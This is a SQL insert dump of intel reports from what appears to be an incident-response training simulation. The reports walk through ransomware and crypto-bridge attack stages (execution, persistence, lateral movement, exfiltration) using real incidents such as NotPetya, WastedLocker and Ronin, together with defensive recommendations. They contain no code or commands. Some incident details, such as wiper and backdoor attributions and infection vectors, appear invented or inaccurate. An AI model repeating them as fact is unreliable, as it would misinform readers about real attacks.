(444, 85, 924, 5, 'Operational Disruption and Incident Response', '### Context\nThe propagation of the ransomware resulted in severe operational disruptions within the NHS, affecting patient care and hospital services.\n\n### Insight\nThe strain on resources highlighted the critical need for robust incident response strategies. Additionally, a kill-switch domain was accidentally discovered, which halted the spread of the ransomware temporarily.\n\n### Next Steps\nInvestigate the impact of the kill-switch domain discovery and prepare for potential future attacks by reinforcing cybersecurity measures.', '2026-01-15 01:03:39'),
(445, 85, 925, 6, NULL, NULL, '2026-01-15 01:03:39'),
(446, 86, 926, 1, 'Malicious Payload Deployment Detected', '# Report: Malicious Payload Deployment Detected\n\n## Overview\nFollowing the detection of RDP brute-force attempts, our systems have identified the deployment of a malicious payload. This marks the execution phase of the attack.\n\n## Details\n- **Payload Type:** SamSam ransomware\n- **Delivery Mechanism:** Confirmed through compromised RDP sessions\n- **Timestamp:** 2 hours after initial access detection\n\n## Implications\nThe execution of this payload suggests that the attackers have gained a significant foothold within the network, allowing them to initiate the encryption process on targeted systems.\n\n## Recommendations\n- Immediate isolation of affected systems\n- Deployment of endpoint protection solutions to detect and block further payload executions\n\n## Next Steps\nPrepare for potential persistence mechanisms as attackers may attempt to maintain access even if the payload is neutralized.', '2026-01-15 01:04:52'),
(447, 86, 927, 2, 'Establishing Foothold: Persistence Mechanisms Analyzed', '# Report: Establishing Foothold - Persistence Mechanisms Analyzed\n\n## Overview\nPost-malicious payload deployment, analysis indicates that attackers are establishing persistence within the network.\n\n## Details\n- **Persistence Techniques:** Scheduled tasks and registry key modifications\n- **Targets:** Critical servers and high-value endpoints\n- **Detection:** Unusual network traffic patterns and system anomalies\n\n## Implications\nThe use of persistence mechanisms indicates a calculated effort to maintain access and control over the compromised network components.\n\n## Recommendations\n- Conduct thorough network and system scans for known persistence signatures\n- Implement enhanced monitoring for unusual system changes\n\n## Next Steps\nFocus on detecting lateral movement as attackers may attempt to spread the ransomware further within the network.', '2026-01-15 01:04:52'),
(448, 86, 928, 3, 'Lateral Movement Detected: Ransomware Spreading', '# Report: Lateral Movement Detected - Ransomware Spreading\n\n## Overview\nEvidence of lateral movement has been detected, indicating that the ransomware is spreading across the network.\n\n## Details\n- **Movement Method:** Utilizing compromised credentials and network shares\n- **Affected Systems:** Multiple network segments including user workstations and file servers\n- **Indicators of Compromise:** Elevated network traffic and file encryption activities\n\n## Implications\nThe lateral spread of ransomware significantly increases the risk of data loss and operational disruption.\n\n## Recommendations\n- Segment the network to contain the spread\n- Change compromised credentials and enhance password policies\n\n## Next Steps\nPrepare for potential data exfiltration activities as attackers may attempt to harvest sensitive information.', '2026-01-15 01:04:52'),
(449, 86, 929, 4, 'Exfiltration Alert: Data Harvesting Activities Identified', '# Report: Exfiltration Alert - Data Harvesting Activities Identified\n\n## Overview\nFollowing the spread of ransomware, there are indications of data harvesting activities aimed at exfiltrating sensitive information.\n\n## Details\n- **Methods Employed:** Data compression and encrypted outbound communications\n- **Targeted Data:** Customer records and internal financial documents\n- **Detection:** Unusual data flows to external IP addresses\n\n## Implications\nData exfiltration poses a significant threat to privacy and regulatory compliance, potentially leading to reputational damage and legal consequences.\n\n## Recommendations\n- Monitor and block suspicious outbound communications\n- Review and tighten data access controls\n\n## Next Steps\nAnticipate and prepare for ransom demands, ensuring communication channels are monitored for any contact from the attackers.', '2026-01-15 01:04:52'),
(450, 86, 930, 5, 'Ransom Demand Intercepted: Communication Analysis', '# Report: Ransom Demand Intercepted - Communication Analysis\n\n## Overview\nA ransom demand from the attackers has been intercepted, marking the command and control phase of the attack.\n\n## Details\n- **Communication Method:** Email with ransom instructions\n- **Demand Amount:** $51,000 in Bitcoin\n- **Deadline:** Payment required within 7 days to prevent data release\n\n## Implications\nThe intercepted communication highlights the attackers\' intent to monetize the attack, leveraging encrypted data as leverage.\n\n## Recommendations\n- Engage cybersecurity and legal experts to evaluate response options\n- Consider possible negotiation strategies and explore decryption solutions\n\n## Next Steps\nContinue monitoring for any further communications from the attackers and implement a public relations strategy to manage potential fallout.', '2026-01-15 01:04:52'),
(451, 86, 931, 6, NULL, NULL, '2026-01-15 01:04:52'),
(452, 87, 960, 1, NULL, NULL, '2026-01-17 03:37:48'),
(453, 87, 961, 2, 'Analysis of Malicious Script Execution', '## Overview\nFollowing the suspicious remote access attempt, a malicious script execution was detected within the city\'s systems. This is indicative of the attackers moving to the next phase of their operation.\n\n## Technical Details\n- **Script Type**: PowerShell script\n- **Execution Context**: The script was executed under a compromised user account with elevated privileges.\n- **Detected Actions**:\n  - **File Encryption**: The script initiated file encryption processes on critical city servers.\n  - **Network Reconnaissance**: The script performed network scanning to identify other vulnerable systems.\n\n## Implications\nThis script execution is a clear signal of an active attack, transitioning from initial access to execution. Immediate containment and further investigation are required to prevent further damage.', '2026-01-17 03:37:48'),
(454, 87, 962, 3, 'Unauthorized Account Creation Investigation', '## Overview\nPost detection of malicious script execution, an unauthorized account creation was observed. This suggests the attackers are establishing persistence within the system.\n\n## Technical Details\n- **Account Name**: temp_admin_balt\n- **Privileges**: Administrative rights granted\n- **Creation Method**: The account was created using a compromised admin credential via the compromised remote access tool.\n\n## Implications\nThe creation of unauthorized accounts allows the attackers to maintain access even if initial entry points are closed. This persistence mechanism requires immediate intervention to revoke unauthorized privileges and secure credentials.', '2026-01-17 03:37:48'),
(455, 87, 963, 4, 'Investigation into Lateral Movement Activity', '## Overview\nFollowing the establishment of persistence, anomalous lateral movement activity was detected, indicating the attackers are exploring and exploiting additional systems within the network.\n\n## Technical Details\n- **Movement Pattern**: The attackers utilized existing network shares and admin credentials to access other critical systems.\n- **Tools Used**: Remote Desktop Protocol (RDP) and SMB protocol were primarily used for lateral movement.\n\n## Implications\nThis lateral movement could lead to further system compromises, increasing the risk of widespread impact. Immediate network segmentation and enhanced monitoring are recommended to mitigate further propagation.', '2026-01-17 03:37:48'),
(456, 87, 964, 5, 'Data Exfiltration Attempt Analysis', '## Overview\nThe final stage observed was an attempt to exfiltrate sensitive data from the compromised systems. This highlights the attackers\' objective to extract valuable information.\n\n## Technical Details\n- **Data Type**: Financial records and personal information.\n- **Exfiltration Method**: Data was compressed and encrypted before being transmitted over HTTP to an external server.\n- **Destination IP**: Traced to a known malicious IP address previously associated with similar ransomware activities.\n\n## Implications\nSuccessful data exfiltration could result in severe financial and reputational damage. A comprehensive response strategy to secure data in transit and at rest is critical, alongside legal consultations for potential breach notifications.', '2026-01-17 03:37:48'),
(457, 88, 965, 1, 'WastedLocker Payload Execution', '## Context for WastedLocker Payload Execution\n\nFollowing the successful phishing campaign, Evil Corp has initiated the deployment of the WastedLocker ransomware payload. This malware is specifically crafted to encrypt files crucial to Garmin\'s operations, demanding a significant ransom.\n\n### Key Indicators:\n- **Phishing Origin**: Traced to a compromised email server.\n- **Payload Delivery**: Via malicious email attachments and links.\n\n### Next Steps:\nPrepare for potential payload execution by monitoring unusual file changes and system behavior indicative of malware activity.', '2026-01-17 03:38:37'),
(458, 88, 966, 2, 'Persistence through Scheduled Tasks', '## Insight into Persistence Mechanisms\n\nWith the WastedLocker payload now active, Evil Corp employs techniques to ensure the malware persists across system reboots, primarily through the creation of scheduled tasks.\n\n### Persistence Details:\n- **Scheduled Tasks**: Configured to execute the ransomware upon system startup.\n- **Registry Modifications**: Additional keys for maintaining persistence.\n\n### Next Steps:\nEnhance monitoring of task scheduler activities and registry changes to detect and mitigate persistence strategies.', '2026-01-17 03:38:37'),
(459, 88, 967, 3, 'Lateral Movement via RDP Detected', '## Analysis of Lateral Movement\n\nEvil Corp\'s objective to infiltrate deeper into Garmin\'s network is evident through the utilization of Remote Desktop Protocol (RDP) for lateral movement.\n\n### Movement Patterns:\n- **RDP Sessions**: Unusual login attempts from compromised accounts.\n- **Network Traffic Anomalies**: Increased data transfer between key nodes.\n\n### Next Steps:\nStrengthen RDP security policies, monitor unusual login patterns, and restrict access to critical systems.', '2026-01-17 03:38:37'),
(460, 88, 968, 4, 'Data Exfiltration and Encryption - Final Stage', '## Final Stage of WastedLocker Attack\n\nEvil Corp has reached the final stage of their attack, focusing on data exfiltration and the encryption of sensitive data, leading to significant operational disruptions.\n\n### Key Observations:\n- **Data Exfiltration**: Substantial outbound traffic to known malicious IPs.\n- **Encryption Impact**: Critical systems and data rendered inaccessible.\n\n### Next Steps:\nInitiate incident response protocols, assess the full extent of the breach, and consider negotiation strategies while exploring decryption possibilities.', '2026-01-17 03:38:37'),
(461, 88, 969, 5, NULL, NULL, '2026-01-17 03:38:37'),
(462, 89, 970, 1, NULL, NULL, '2026-01-17 03:39:18'),
(463, 89, 971, 2, 'Malware Execution Analysis', '### Malware Execution Observed\n\nFollowing the detection of suspicious network activity, our team confirmed the execution of the LockerGoga ransomware on several endpoints within the aluminum manufacturing network. **Indicators of Compromise (IoCs)** identified include:\n\n- Unfamiliar binaries executed from `C:\\Windows\\Temp`\n- Code signing certificates used to bypass security tools\n\n**Next Steps:** Investigate the initial access point to determine how the malware was deployed and identify other potentially compromised systems.', '2026-01-17 03:39:18'),
(464, 89, 972, 3, 'Persistence Mechanism Investigation', '### Unauthorized Scheduled Task Created\n\nPost malware execution, an unauthorized scheduled task was identified. This task is configured to run a malicious executable at regular intervals, ensuring the ransomware\'s persistence across reboots. **Details include:**\n\n- Task name: `UpdateCheck`\n- Executable path: `C:\\Windows\\System32\\update.exe`\n\n**Next Steps:** Disable the scheduled task and analyze its creation method to prevent future persistence mechanisms.', '2026-01-17 03:39:18'),
(465, 89, 973, 4, 'Lateral Movement Activity Report', '### Lateral Movement Detected Across Network\n\nThe ransomware has initiated lateral movement within the network. **Key Observations:**\n\n- Unauthorized SMB connections from compromised systems\n- Use of valid credentials to access shared network drives\n\n**Next Steps:** Isolate affected systems and monitor for further lateral movement attempts. Begin a comprehensive credential audit to limit unauthorized access.', '2026-01-17 03:39:18'),
(466, 89, 974, 5, 'Data Exfiltration Monitoring', '### Data Exfiltration Alert Triggered\n\nA significant alert was triggered indicating potential data exfiltration activity. **Observed actions include:**\n\n- Large amounts of data compressed and sent to external IP addresses\n- Use of encrypted communication channels\n\n**Next Steps:** Identify the scope of data exfiltrated and implement outbound traffic restrictions to prevent further data loss.', '2026-01-17 03:39:18'),
(467, 89, 975, 6, 'Ransom Note Discovery and Impact Assessment', '### Ransom Note Discovered\n\nA ransom note has been discovered on multiple machines, indicating the impact of the LockerGoga ransomware. **Content highlights:**\n\n- Demands for payment in cryptocurrency\n- Threats to leak sensitive data if demands are not met\n\n**Next Steps:** Begin the process of backup restoration and manual operations to minimize downtime. Engage with law enforcement and cybersecurity experts for further guidance.', '2026-01-17 03:39:18'),
(468, 90, 976, 1, 'Understanding the Initial Breach', '## Initial Network Breach Detected\n\nFollowing the detection of an unauthorized network intrusion, forensic analysis indicates that the attack vector was a compromised software update. This method allowed attackers to bypass Maersk\'s perimeter defenses, gaining access to critical systems.\n\n### Key Findings:\n- **Attack Vector:** Compromised software update\n- **Entry Point:** Vulnerable third-party application\n- **Impacted Systems:** Corporate network including email servers and critical business applications\n\n### Next Steps:\nThe next phase involves monitoring the execution and spread of the malware to understand its impact and to implement measures to halt its progress. The team is also tasked with identifying any additional vulnerabilities that could be exploited by similar attacks.', '2026-01-17 03:39:49'),
(469, 90, 977, 2, 'Analyzing the NotPetya Malware Spread', '## Malware Execution and Spread - NotPetya Detected\n\nAs the NotPetya malware activated, it quickly propagated through the network, leveraging lateral movement techniques. NotPetya, a wiper disguised as ransomware, aimed to cause maximum disruption by encrypting the Master Boot Record (MBR) of infected machines.\n\n### Key Points:\n- **Malware Characteristics:** Wiper malware masquerading as ransomware\n- **Propagation Method:** Exploits EternalBlue and other vulnerabilities\n- **Impact:** Widespread system failures, leading to operational standstill\n\n### Strategic Response:\nThe priority is to identify any points of resilience within the network, such as isolated systems or backups, that can be leveraged to begin recovery. The incident response team must also work on containing the spread by isolating affected segments and implementing network controls.', '2026-01-17 03:39:49'),
(470, 90, 978, 3, NULL, NULL, '2026-01-17 03:39:49'),
(471, 91, 979, 1, 'Analysis of Initial Breach Points', '### Contextual Overview\nFollowing the detection of a supply chain compromise, our analysis has identified multiple potential entry points. The breach likely originated from a third-party vendor with privileged access to the corporate network.\n\n### Key Findings\n- **Vulnerability Exploitation**: Initial breach vectors include outdated software on connected devices and inadequate network segmentation.\n- **Supply Chain Vendor**: The compromised vendor was involved in the distribution of pharmaceutical components, highlighting the need for stringent security protocols.\n\n### Recommendations\n- Immediate audit of third-party vendor security practices.\n- Implementation of stricter access controls and network segmentation.', '2026-01-17 03:41:52'),
(472, 91, 980, 2, 'Impact Assessment: NotPetya Malware Deployment', '### Malware Overview\nNotPetya, a variant of the Petya ransomware, has been deployed, resulting in widespread disruption across pharmaceutical operations.\n\n### Effects Observed\n- **System Lockdowns**: Critical systems have been encrypted, making data recovery difficult without backups.\n- **Operational Halt**: Production and distribution channels have experienced significant downtime.\n\n### Immediate Actions\n- Initiate incident response protocols focused on containment and eradication.\n- Begin forensic analysis to understand malware spread and potential points of persistence.', '2026-01-17 03:41:52'),
(473, 91, 981, 3, 'Persistence Strategy Analysis', '### Backdoor Installation\nOur threat intelligence indicates the presence of backdoor installations, designed to maintain persistent access within the network.\n\n### Technical Details\n- **Backdoor Type**: Custom remote access tools have been deployed, indicating a sophisticated attack strategy.\n- **Network Impact**: These backdoors facilitate further infiltration and data theft.\n\n### Mitigation Steps\n- Conduct a complete sweep for known backdoor signatures.\n- Strengthen network monitoring to detect unusual outbound traffic.', '2026-01-17 03:41:52'),
(474, 91, 982, 4, 'Lateral Movement Techniques', '### Threat Actor Activities\nCredential theft has facilitated extensive lateral movement across the network, targeting vaccine production systems.\n\n### Observations\n- **Credential Harvesting**: Attackers have obtained privileged credentials, allowing access to sensitive areas of the network.\n- **Targeted Systems**: Focus has been on systems integral to vaccine production and distribution.\n\n### Defensive Measures\n- Implement multi-factor authentication across all systems.\n- Regularly update and patch systems to reduce vulnerabilities.', '2026-01-17 03:41:52'),
(475, 91, 983, 5, 'Data Exfiltration Incident', '### Exfiltration Analysis\nSensitive information, including proprietary research and personal data, has been exfiltrated, posing significant operational and reputational risks.\n\n### Data Types Compromised\n- **Intellectual Property**: Critical R&D data relating to new pharmaceuticals.\n- **Personal Information**: Employee and client data, increasing the risk of further exploitation.\n\n### Strategic Response\n- Notify affected parties and regulators as required by compliance standards.\n- Initiate data breach management and recovery processes.', '2026-01-17 03:41:52'),
(476, 91, 984, 6, 'Destructive Actions on Critical Infrastructure', '### Infrastructure Targeting\nICS/SCADA systems have been specifically targeted, leading to potential safety and operational risks.\n\n### Impact Analysis\n- **System Disruptions**: Operational technology has been disrupted, affecting production safety.\n- **Safety Concerns**: Risk of physical harm due to altered operational parameters.\n\n### Remediation Strategies\n- Isolate affected systems and restore from secure backups.\n- Review and update incident response plans to include ICS/SCADA scenarios.', '2026-01-17 03:41:52'),
(477, 91, 985, 7, 'Legal Implications: Cyber Insurance \'Act of War\' Clause', '### Legal Context\nThe cyber insurance \'act of war\' clause has been invoked, sparking a legal battle over coverage applicability.\n\n### Key Considerations\n- **Policy Interpretation**: Insurers argue that the attack constitutes an act of war, thus voiding coverage.\n- **Precedent and Implications**: This case could set a legal precedent affecting future cyber insurance claims.\n\n### Next Steps\n- Engage legal counsel specializing in cyber law to navigate the complexities of this case.\n- Explore alternative risk management strategies including enhanced cyber defenses.', '2026-01-17 03:41:52'),
(478, 92, 986, 1, 'Post-Phishing Analysis', '### Overview\nAfter the initial access was gained via a phishing email, it is crucial to understand the method and content used to deceive the recipient. \n\n### Details\n- **Phishing Email Characteristics**: The email appeared to be from a trusted vendor, using social engineering tactics to prompt immediate action.\n- **Payload**: The attachment contained a malicious macro that executed the NotPetya malware.\n\n### Next Steps\nPrepare for potential malware execution. Monitor network traffic for unusual activities, and review email filtering rules to prevent similar incidents.', '2026-01-17 03:41:59'),
(479, 92, 987, 2, 'Malware Execution Insight', '### Overview\nThe NotPetya payload has been executed. This stage focuses on the understanding of the malware\'s impact on initial systems.\n\n### Details\n- **Spread Mechanism**: Utilized EternalBlue and Mimikatz to propagate.\n- **Initial Impact**: Systems experienced lockouts and data encryption.\n\n### Next Steps\nAnticipate persistence mechanisms. Strengthen endpoint security and monitor for backdoor installations. Consider isolating affected systems to prevent further spread.', '2026-01-17 03:41:59');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(480, 92, 988, 3, 'Persistence Establishment Review', '### Overview\nPersistence was established through backdoor installations, allowing attackers to maintain access.\n\n### Details\n- **Backdoor Tools**: Custom scripts and known rootkits were identified.\n- **System Vulnerabilities**: Exploited outdated software, highlighting integration challenges.\n\n### Next Steps\nPrepare for lateral movement. Strengthen network segmentation, patch legacy systems, and conduct thorough vulnerability assessments.', '2026-01-17 03:41:59'),
(481, 92, 989, 4, 'Lateral Movement Analysis', '### Overview\nThe attackers moved laterally across TNT Express\'s legacy systems, utilizing the established backdoors.\n\n### Details\n- **Targeted Systems**: Focus was on those running outdated operating systems with known vulnerabilities.\n- **Technique**: Utilized stolen credentials to escalate privileges and move within the network.\n\n### Next Steps\nPrepare for potential data exfiltration and destruction. Implement tighter access controls and monitor for signs of data manipulation or theft.', '2026-01-17 03:41:59'),
(482, 92, 990, 5, NULL, NULL, '2026-01-17 03:41:59'),
(483, 93, 991, 1, 'Analysis of Initial Phishing Vector', '### Overview\nThe initial access was achieved through a sophisticated phishing attack targeting employees with access to the Ronin Bridge infrastructure. This report delves into the methods used, including the email content and the malicious payload attached.\n\n### Email Content\nThe phishing email impersonated a known partner organization, urging the recipient to open an attachment containing malicious macros. The subject line read: \'Urgent Security Update Required\'.\n\n### Malicious Payload\nOnce the attachment was opened, it executed a script that established a foothold within the network. The script was designed to deploy further malicious payloads, which we will explore in subsequent reports.\n\n### Recommendations\n- Implement advanced email filtering solutions.\n- Conduct regular phishing awareness training for all staff.', '2026-01-17 03:42:27'),
(484, 93, 992, 2, 'Deployment of Destructive Malware', '### Overview\nFollowing the successful phishing attack, the threat actors deployed destructive malware across compromised systems. This report provides insights into the malware used and its intended effects.\n\n### Malware Identification\nThe deployed malware, identified as a variant of \'HermeticWiper\', was designed to overwrite critical system files, rendering systems inoperable and covering tracks of the initial access.\n\n### Impact\nThe malware\'s primary objective was to disrupt operations and distract security teams while the attackers established persistence elsewhere in the network.\n\n### Countermeasures\n- Regularly update endpoint protection solutions.\n- Ensure offline backups are available and tested for recovery.', '2026-01-17 03:42:27'),
(485, 93, 993, 3, 'Backdoor Installation for Persistent Access', '### Overview\nWith systems disrupted by malware, the attackers installed a backdoor to maintain persistent access. This report explores the backdoor\'s characteristics and its implications for network security.\n\n### Backdoor Details\nThe backdoor, identified as \'BLINDINGCAN\', enabled remote access and control over compromised systems. It was hidden within legitimate processes to avoid detection.\n\n### Persistence Mechanism\nThe backdoor leveraged Windows Task Scheduler to ensure it reactivated upon system reboot, maintaining attacker access indefinitely.\n\n### Mitigation\n- Regularly review scheduled tasks for anomalies.\n- Implement network segmentation to limit lateral movement.', '2026-01-17 03:42:27'),
(486, 93, 994, 4, 'Credential Dumping and Lateral Movement', '### Overview\nAfter establishing persistence, the attackers initiated credential dumping to facilitate lateral movement towards Validator Nodes. This report explores the techniques used and the implications for network security.\n\n### Credential Dumping Techniques\nAttackers used the \'Mimikatz\' tool to extract credentials from memory, targeting accounts with elevated privileges for broader access.\n\n### Lateral Movement\nWith compromised credentials, attackers moved laterally across the network to access critical Validator Nodes, essential for the subsequent cryptocurrency exfiltration.\n\n### Recommendations\n- Deploy enhanced monitoring for unusual account activity.\n- Implement strict access controls for sensitive nodes.', '2026-01-17 03:42:27'),
(487, 93, 995, 5, NULL, NULL, '2026-01-17 03:42:27'),
(488, 94, 996, 1, 'Suspected Malware Deployment in Multi-Sig Infrastructure', '### Report Overview\nFollowing the detection of a suspicious multi-sig scheme compromise in the Harmony Protocol bridge, further investigation has revealed potential indicators of destructive malware deployment. This suggests a second-stage operation by the Lazarus Group aimed at cementing their control over the compromised systems.\n\n### Key Findings\n- **Malware Type**: Initial analysis indicates the use of a custom malware variant designed to avoid typical detection methods.\n- **Objective**: The malware likely aims to overwrite critical components of the multi-sig infrastructure, ensuring persistent and hidden access.\n- **Impact**: Immediate risks include the degradation of system integrity and the potential for further unauthorized crypto transactions.\n\n### Recommendations\n- **Immediate Actions**: Initiate a comprehensive malware sweep on all nodes involved in the multi-sig process.\n- **Preventive Measures**: Enhance monitoring systems to detect unusual patterns indicative of malware activity.\n\n### Next Steps\nPrepare for potential cryptocurrency laundering attempts as the attackers seek to move compromised assets.', '2026-01-17 03:44:49'),
(489, 94, 997, 2, 'Detection of Cryptocurrency Laundering Infrastructure', '### Report Overview\nSubsequent to the destructive malware deployment, our intelligence has confirmed the presence of a laundering infrastructure used by the Lazarus Group to obfuscate the trail of stolen crypto assets from the Harmony Protocol bridge.\n\n### Key Findings\n- **Infrastructure Identification**: Traces of transactions routed through multiple mixing services and privacy-centric blockchains have been identified.\n- **Patterns Observed**: The laundering process involves small, frequent transfers to minimize detection risk and leverage of tumblers.\n- **Potential Collaborators**: Analysis suggests possible partnerships with other known cybercriminal groups to facilitate asset laundering.\n\n### Recommendations\n- **Enhanced Monitoring**: Implement blockchain analysis tools to track suspicious transactions across multiple chains.\n- **Collaboration**: Work with global financial authorities to identify and freeze assets in identified laundering channels.\n\n### Future Implications\nExpect heightened complexity in tracking the laundered funds. Continuous intelligence sharing and collaboration with international agencies will be crucial to dismantle the laundering network.', '2026-01-17 03:44:49'),
(490, 94, 998, 3, NULL, NULL, '2026-01-17 03:44:49'),
(491, 95, 999, 1, 'Deep Dive: Initial Access through Smart Contract Interaction', '### Overview\nFollowing the detection of **Suspicious Smart Contract Interaction**, further analysis reveals that the attacker leveraged a previously unknown vulnerability in the smart contract\'s interaction protocols.\n\n### Technical Details\n- **Entry Point**: The attacker accessed the smart contract via an unmonitored API call, bypassing standard authentication checks.\n- **Method**: Exploited discrepancies in function calling sequences to gain unauthorized access.\n\n### Implications\nThis incident indicates the presence of potentially multiple vulnerabilities in the contract\'s interaction layer that need immediate attention.\n\n### Next Steps\nThe team is directed to focus on the integrity of the contract\'s cryptographic components as we suspect a deeper flaw may exist, leading to the **Exploitation of Signature Verification Vulnerability**.', '2026-01-17 03:45:24'),
(492, 95, 1000, 2, 'Uncovering the Signature Verification Vulnerability', '### Overview\nThe **Exploitation of Signature Verification Vulnerability** alert stems from the attacker\'s ability to manipulate the contract\'s verification process, allowing unauthorized transaction approvals.\n\n### Technical Details\n- **Vulnerability Type**: Signature verification bypass.\n- **Exploit Method**: The attacker crafted signatures mimicking legitimate sources, leveraging a flaw in the signature validation logic to approve transactions.\n\n### Implications\nThis vulnerability poses a critical threat, as it undermines the fundamental trust model of the smart contract.\n\n### Recommendations\n- Immediate patching of the verification logic to close the bypass loophole.\n- Initiate a comprehensive review of the contract\'s cryptographic protocols.\n\n### Forward Action\nInvestigate potential **Persistent Access via Compromised Keys** to ascertain if the attacker has maintained ongoing access through compromised cryptographic keys.', '2026-01-17 03:45:24'),
(493, 95, 1001, 3, 'Assessing Persistent Access and Compromised Keys', '### Overview\nFollowing the signature verification exploit, evidence suggests the attacker has established **Persistent Access via Compromised Keys**.\n\n### Technical Details\n- **Access Method**: Utilization of private keys obtained through unknown means, possibly involving phishing or insider threats.\n- **Impact**: Continuous unauthorized access to the smart contract\'s administrative functions.\n\n### Implications\nThis persistent access allows the attacker to maintain control over the contract, posing ongoing risks of further exploitation and funds misappropriation.\n\n### Countermeasures\n- Revoke and regenerate all keys associated with the smart contract.\n- Implement enhanced monitoring of key usage patterns to detect anomalies.\n\n### Looking Ahead\nThe operation now shifts focus towards **Funds Exfiltration and Bug Bounty Offer**, analyzing the attacker\'s motives behind the unusual $10M bug bounty offer and tracing the funds\' flow post-exfiltration.', '2026-01-17 03:45:24'),
(494, 95, 1002, 4, NULL, NULL, '2026-01-17 03:45:24'),
(495, 96, 1003, 1, 'Analysis of Initial Cross-Chain Transaction Patterns', '## Context\nAfter detecting the suspicious cross-chain transaction, analysis reveals that the transaction path involved multiple blockchain networks, including Ethereum, Binance Smart Chain, and Polygon. The transaction was initiated using a newly created wallet with no prior transaction history, suggesting an attempt to obfuscate the source.\n\n## Implications\nThis transaction pattern is indicative of a probing attempt, possibly to test the security protocols of different DeFi platforms across chains before executing further actions.\n\n## Recommendations\n- Implement stricter monitoring on new wallet activities with high-value transactions.\n- Enhance cross-chain transaction auditing to identify similar patterns quickly.', '2026-01-17 03:47:32'),
(496, 96, 1004, 2, 'Technical Breakdown of Cross-Chain Exploitation', '## Context\nFollowing the initial transaction, the attacker exploited a cross-chain vulnerability that allowed unauthorized access to multiple blockchain networks. The exploitation involved manipulating smart contracts to bypass security checks.\n\n## Technical Details\nThe vulnerability leveraged was a flaw in the validation logic of cross-chain bridges, enabling the attacker to create fake transactions that appeared legitimate.\n\n## Implications\nThis exploitation highlights the critical need for comprehensive security reviews of cross-chain bridges and associated smart contracts.\n\n## Recommendations\n- Conduct immediate security audits on cross-chain bridges.\n- Develop and deploy patches to address the identified vulnerabilities.', '2026-01-17 03:47:32'),
(497, 96, 1005, 3, 'Persistence Established via Compromised Smart Contracts', '## Context\nPost-exploitation, the attacker established persistence by deploying malicious smart contracts across various networks. These contracts were designed to maintain access and facilitate further unauthorized transactions.\n\n## Analysis\nThe deployed contracts included backdoors and logic bombs that could be activated remotely, indicating advanced planning and technical sophistication.\n\n## Implications\nThis persistence mechanism could allow the attacker to maintain control over the exploited networks indefinitely, posing ongoing risks.\n\n## Recommendations\n- Identify and isolate compromised smart contracts.\n- Revoke permissions and conduct a thorough review of contract interactions.', '2026-01-17 03:47:32'),
(498, 96, 1006, 4, 'Lateral Movement Patterns Across Blockchain Networks', '## Context\nFollowing persistence establishment, the attacker executed lateral movement across blockchain networks to diversify risk and maximize reach.\n\n## Patterns Observed\nThe attacker utilized decentralized exchange (DEX) platforms to swap and transfer assets across chains, complicating traceability.\n\n## Implications\nThis movement not only aids in obfuscation but also indicates a broader strategy to test vulnerabilities in different network ecosystems.\n\n## Recommendations\n- Increase monitoring of large asset transfers between DEX platforms.\n- Collaborate with inter-chain security teams to track and respond to such movements.', '2026-01-17 03:47:32'),
(499, 96, 1007, 5, 'Unexpected Return of Funds and Initiation of Dialogue', '## Context\nIn a surprising turn, the attacker returned the exfiltrated funds, opening a dialogue to disclose vulnerabilities.\n\n## Actions Taken\nThe return was accompanied by a message outlining the exploited vulnerabilities and recommendations for strengthening security.\n\n## Implications\nThis unusual behavior suggests the attack may have been an ethical hacking attempt, intended to expose weaknesses rather than cause financial harm.\n\n## Recommendations\n- Engage with the attacker, if possible, to gain further insights into the vulnerabilities.\n- Publicly acknowledge the incident and outline measures taken to prevent future occurrences.', '2026-01-17 03:47:32'),
(500, 96, 1008, 6, NULL, NULL, '2026-01-17 03:47:32'),
(501, 97, 1009, 1, 'Analysis of Initial Access Through Router Exploitation', '# Analysis of Initial Access Through Router Exploitation\n\n## Background\nThe initial alert was triggered by the detection of an unprotected router being exploited. This indicates a potential entry point for unauthorized access into the T-Mobile network.\n\n## Vulnerability Details\n- **Router Model**: Identified as a model frequently targeted due to outdated firmware and default configurations.\n- **Exploitation Method**: Likely involved the use of known vulnerabilities to gain access.\n\n## Recommendations\n- Conduct a full audit of router configurations and firmware versions.\n- Implement immediate patching and updating protocols.\n\n## Next Steps\nPrepare for possible script execution following initial access, indicating an attempt to establish further control.', '2026-01-17 03:48:32'),
(502, 97, 1010, 2, 'Detection of Malicious Script Execution', '# Detection of Malicious Script Execution\n\n## Overview\nFollowing the initial access, a malicious script execution was identified, suggesting the attacker is attempting to gain a foothold and potentially deploy more payloads.\n\n## Script Analysis\n- **Purpose**: The script appears to be designed to modify system settings or deploy additional malware.\n- **Indicators of Compromise (IoCs)**: Files created, registry changes, and unusual process activity.\n\n## Recommendations\n- Isolate affected systems immediately to prevent further spread.\n- Perform a comprehensive malware analysis.\n\n## Next Steps\nMonitor for persistence mechanisms as the attacker may attempt to maintain access.', '2026-01-17 03:48:32'),
(503, 97, 1011, 3, 'Establishment of Persistence Mechanism', '# Establishment of Persistence Mechanism\n\n## Situation\nPersistence mechanisms have been established, suggesting the attacker is securing ongoing access to the network.\n\n## Mechanism Details\n- **Techniques Used**: Scheduled tasks, registry modifications, or backdoor installation.\n- **Impact**: Allows continued access even after system reboots.\n\n## Recommendations\n- Review scheduled tasks and registry settings for unauthorized entries.\n- Implement endpoint detection and response (EDR) tools to identify ongoing intrusions.\n\n## Next Steps\nPrepare for potential lateral movement as the attacker may seek to expand their network access.', '2026-01-17 03:48:32'),
(504, 97, 1012, 4, 'Lateral Movement Detected Across Network', '# Lateral Movement Detected Across Network\n\n## Current Situation\nThe attacker is moving laterally across the network, attempting to access critical systems and sensitive data.\n\n## Techniques Observed\n- **Methods**: Pass-the-hash, remote desktop protocol (RDP) abuse, and network share exploitation.\n- **Targets**: High-value servers and databases.\n\n## Recommendations\n- Implement network segmentation to limit lateral movement.\n- Increase monitoring of privileged accounts and network activity.\n\n## Next Steps\nPrepare for potential data exfiltration attempts, as the attacker may attempt to extract large volumes of data.', '2026-01-17 03:48:32'),
(505, 97, 1013, 5, NULL, NULL, '2026-01-17 03:48:32'),
(506, 98, 1014, 1, NULL, NULL, '2026-01-17 03:50:17'),
